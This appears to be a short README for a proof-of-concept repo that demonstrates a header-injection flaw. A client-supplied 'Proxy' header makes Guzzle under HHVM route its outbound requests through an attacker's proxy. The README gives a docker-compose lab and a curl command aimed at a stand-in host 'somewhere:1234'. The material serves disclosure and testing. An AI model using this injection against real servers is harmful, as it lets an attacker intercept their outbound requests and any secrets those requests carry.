This is how the vulnerability works:
- Do the usual PHP thing of exposing user-supplied headers as
$_SERVER['HTTP_*'] - Be using Guzzle from an HHVM request handler
- As an HTTP client, inject a
Proxy: my-malicious-serviceheader to any request made - Watch as Guzzle helpfully sends the request to the malicious proxy, supplied by the client
This repo contains a docker-compose setup that puts index.php into an HHVM FastCGI container. To test:
- docker-compose up -d
- curl -vv -H 'Proxy: somewhere:1234' http://localhost:8001/index.php
- collect reflected request at somewhere:1234